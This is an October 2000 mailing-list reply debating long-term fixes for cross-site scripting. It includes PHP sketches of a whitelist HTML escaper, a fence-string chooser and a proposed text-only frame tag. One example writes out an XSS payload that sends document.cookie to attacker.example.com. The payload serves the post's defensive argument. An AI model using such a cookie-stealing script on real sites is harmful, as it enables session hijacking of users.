
Re: Cross site scripting: a long term fix


From: David M Chess/Watson/IBM <chess () US IBM COM>
Date: Tue, 10 Oct 2000 13:38:53 -0400

Cooper wrote:

> What's the difference between:
>
> $RANDOM=gen_random();
> echo "<TEXT key=$RANDOM>$DB_TEXT_FIELD</TEXT key=$RANDOM>";
>
> and
>
> $HTML_OUT=text2html($DB_TEXT_FIELD);
> echo "<P>$HTML_OUT<P>"

Well, one difference that springs to mind is that the <TEXT> approach
relies only on the client knowing how not to interpret a bunch of data,
whereas the text2html approach relies on the client and the text2html()
function having the same idea of what's interpretable and what isn't.  So
if (for instance) the client interprets some complex multi-byte sequence as
a Unicode less-than, but the text2html() function doesn't, an attacker may
be able to get markup to the client, past text2html(), by using that
sequence.  We've certainly seen multiple instances of this kind of
"disagreeing interpreters" problem in the past!  A whitelist-based
text2html (that escaped every character not in a recognized list of OK
characters) might work better, but again you have to make sure to get the
whitelist right to avoid both insecurity and ugliness.
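
Just to make the whitelist idea concrete, here's a rough sketch of what such
a text2html() might look like (the function name and the particular list of
OK characters are invented for illustration, and it works byte-by-byte, so
multi-byte encodings are exactly where it would need more care):

    // Sketch of a whitelist-based text2html(): any byte that isn't on
    // a short list of known-harmless characters is replaced with a
    // numeric character reference, so no "<" -- however it was encoded
    // on the way in -- reaches the client unescaped.
    function text2html_whitelist($text) {
        $ok  = "abcdefghijklmnopqrstuvwxyz"
             . "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
             . "0123456789 .,!?()-";
        $out = "";
        for ($i = 0; $i < strlen($text); $i++) {
            $c = $text[$i];
            if (strpos($ok, $c) !== false) {
                $out .= $c;                    // known-harmless: pass through
            } else {
                $out .= "&#" . ord($c) . ";";  // anything else: escape it
            }
        }
        return $out;
    }

    $HTML_OUT = text2html_whitelist($DB_TEXT_FIELD);
    echo "<P>$HTML_OUT</P>";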

> Also note that your solution if implemented today will make your
> forum only accessible to those lucky few that are willing to update
> their browser so they can browse sites that use that tag. The rest
> will not see the posted comments.

Actually the rest *will* see the posted comments, and their browsers will
happily interpret any HTML contained therein.  When browsers see tags they
don't recognize, they simply ignore the tags and treat the enclosed text as
ordinary (marked up) stuff.  Try putting <bleen> and </bleen> around some
text in an HTML file you control, and note that the text does not
disappear.  So the "legacy browsers" problem is actually even worse than
you suggest; people with older browsers will be vulnerable, not merely left
out of the conversation.
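
To see why, consider what the <TEXT>-based page actually sends down the wire
if the database field holds a hostile script (the field contents here are
invented for illustration, and mt_rand() stands in for the gen_random()
quoted above):

    // A browser that has never heard of <TEXT> ignores the tags
    // themselves and interprets everything between them as ordinary
    // HTML -- so the script below runs anyway on a legacy client.
    $RANDOM        = mt_rand();   // stand-in for gen_random() above
    $DB_TEXT_FIELD = "<script>document.location="
                   . "'http://attacker.example.com/steal?c='+document.cookie;"
                   . "</script>";
    echo "<TEXT key=$RANDOM>$DB_TEXT_FIELD</TEXT key=$RANDOM>";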

The "how do you end the literal block?" question seems kinda thorny.  A
fence-string could be made to work, but only if page designers can remember
to use a "generate a string that isn't contained in the given string"
function to choose the fence, rather than just hardcoding it or using a
guessable random source.  And such a function might have its own subtle
Unicode-like problems (when are two strings the same?).  A character count
might be plausible, although since no other feature of HTML includes such a
beast it'd probably be hard to get such a thing adopted in practice.  And I
can imagine some (possibly exploitable) trouble making it work, involving
(once again!) things like how to count the characters in a Unicode string,
and how many characters there are in a newline.
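
For what it's worth, the fence-choosing step would have to look something
like this (a sketch; the function name is made up), and even this quietly
assumes that strpos() and the client agree about when one string is
contained in another:

    // "Generate a string that isn't contained in the given string":
    // keep picking random fences until one doesn't occur in the data.
    // The point is that the fence is chosen by looking at the data,
    // not hardcoded and not drawn from a guessable source.
    function choose_fence($data) {
        do {
            $fence = "END" . md5(uniqid(mt_rand(), true));
        } while (strpos($data, $fence) !== false);
        return $fence;
    }

    $fence = choose_fence($DB_TEXT_FIELD);
    echo "<TEXT key=$fence>$DB_TEXT_FIELD</TEXT key=$fence>";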

This is probably worth talking a bit more about, though!  Off the top of my
head, I like Tollef Fog Heen's suggestion of a "go fetch this URI and
render it here as uninterpreted text" tag.  Sort of an IFRAME that's been
turned to the Good Side of the Force.    *8)     It avoids the "legacy
clients are left vulnerable" problem also.
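
Something along those lines might look like the sketch below (the <TEXTFRAME>
tag name, show_comment.php, and $COMMENT_ID are all invented for
illustration; no such tag exists today).  The page points at a separate URI,
and that URI serves the raw field as text/plain, so there's nothing for any
client to misinterpret; a legacy browser that doesn't know the tag shows
nothing, rather than running whatever the attacker posted.

    // In the page (hypothetical tag, invented name):
    echo "<TEXTFRAME src=\"show_comment.php?id=$COMMENT_ID\"></TEXTFRAME>";

    // In show_comment.php (sketch): serve the field uninterpreted.
    header("Content-Type: text/plain");
    echo $DB_TEXT_FIELD;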

DC

